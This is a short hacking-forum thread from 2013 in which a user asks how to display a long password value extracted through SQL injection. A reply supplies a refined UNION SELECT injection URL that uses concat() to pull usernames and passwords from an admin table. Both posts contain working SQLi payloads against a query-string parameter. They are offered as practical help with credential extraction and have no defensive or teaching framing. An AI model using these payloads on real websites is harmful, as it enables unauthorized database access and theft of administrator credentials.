EvilZone

Community => General discussion => Topic started by: burnty on July 15, 2013, 07:28:38 PM

Title: ? SQLi: how to wrap/break_to_new_line a long string ?
Post by: burnty on July 15, 2013, 07:28:38 PM

Greetings; new here. Love the site and look forward to contributing when/where I can.

I cannot (if my death depended on it) find the SQLi command to wrap a long single string that seems to go off-screen.
This is not a concat() or group_concat() situation; this is a single string.
I am using the largest (viewable) null column available.
How to break to a new line after a certain number of characters?

Example:
http://www.example.com/index.php?route=single&news_id=14+and+1=2+union+all+select+0,username,2,3,password,5,6,7%20FROM%20admin-- (http://www.example.com/index.php?route=single&news_id=14+and+1=2+union+all+select+0,username,2,3,password,5,6,7%20FROM%20admin--)

The "password" column is the long single string I need to view over multiple lines.

Cheers.

Title: Re: ? SQLi: how to wrap/break_to_new_line a long string ?
Post by: ande on July 15, 2013, 08:32:07 PM

You can do something like concat('Username: ', username, '<br />Password: ', password, '<br /><br />') and do it all in one column instead. So it goes like:

http://www.example.com/index.php?route=single&news_id=14+and+1=2+union+all+select+0,concat('Username: ', username, '<br />Password: ', password, '<br /><br />'),2,3,4,5,6,7 FROM admin--

That should format it nicely. If you really want to break up a value after x amounts of characters you could do something with length() and substr() I guess, but it wouldn't be a simple query.